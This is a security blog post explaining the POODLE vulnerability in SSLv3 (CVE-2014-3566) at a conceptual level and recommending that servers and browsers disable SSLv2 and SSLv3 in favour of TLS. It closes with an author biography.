Let's start with a story. We recently were estimating the effort to fix up a client's audit findings, when I read "update web server configurations to upgrade SSL support from SSLv2 to SSLv3." To be fair to the auditor, the findings were probably reported before the vulnerability I will describe below (POODLE) was announced. However, SSLv3 was already viewed with suspicion, and had to be disabled if a system needed to be FIPS 140-2 compliant. While not every system needs that, it's indicative that SSLv3 is disallowed from the standard. (By the way the auditor was correct that SSLv2 needed to be disabled. In addition to its many weaknesses, SSLv2 is not compliant with either FIPS 140-2 or the PCI DSS.)
Moral: the fact that one version of a protocol is bad doesn't make the next version acceptable.
A recent announcement of a new vulnerability in SSLv3 (CVE-2014-3566) when using ciphers operating in cipher block chaining (CBC) mode. Because of how SSLv3 handles the block structure and padding out plain text to the block size, it is possible to construct attacks that manipulate padding to disclose plain text. This vulnerability has been dubbed POODLE, for Padding Oracle in Downgraded Legacy Encryption. This vulnerability can be used to mount a man-in-the-middle attack on an encrypted session. Note that even if both client server support TLS (the more recent protocols) the attacker in the middle can force some implementations to downgrade the protocol so the padding oracle can be used. The best explanation of how this vulnerability works is Paul Ducklin's post in Naked Security.
Let's be clear about one thing: this is not a bug that can be patched. POODLE is a weakness in the SSLv3 protocol specification. It is what it is, and people need to stop using it. Period.
The best solution is to disable SSLv2 and SSLv3 support in all of your browsers and web servers. The only possible reason to support SSLv3 on a web server is if you have clients still running IE6 on Windows XP, but I would recommend that you configure your servers securely and eliminate support for IE6. If you absolutely must support SSLv3, at minimum disable all ciphers that operate in CBC mode, but it's better to just disable the protocol, and support only TLS 1.0, TLS 1.1, and TLS 1.2. For browsers, just disable SSLv2 and SSLv3. For Windows, you should be able to do this with a group policy object.
SSL has taken it on the chin this year, first with Heartbleed and now this. We all need to fix our server configurations so that the little lock icon actually means that the servers are trustworthy.
About Andy Sherman
Andy Sherman, Eden Technologies’ security practice lead has a PhD in physics from Rensselaer Polytechnic Institute and started his career in the academic world. He then went to AT&T Bell Laboratories where he discovered the power – and hazards – of large distributed computer networks. It was also at Bell Labs, during the early days of the Internet, that Andy became interested in the security problems associated with public networks. From Bell Labs Andy moved to the financial services industry. There he worked on a large range of infrastructure design, deployment, and management projects, but is best known for his 15+ years in information and technology security.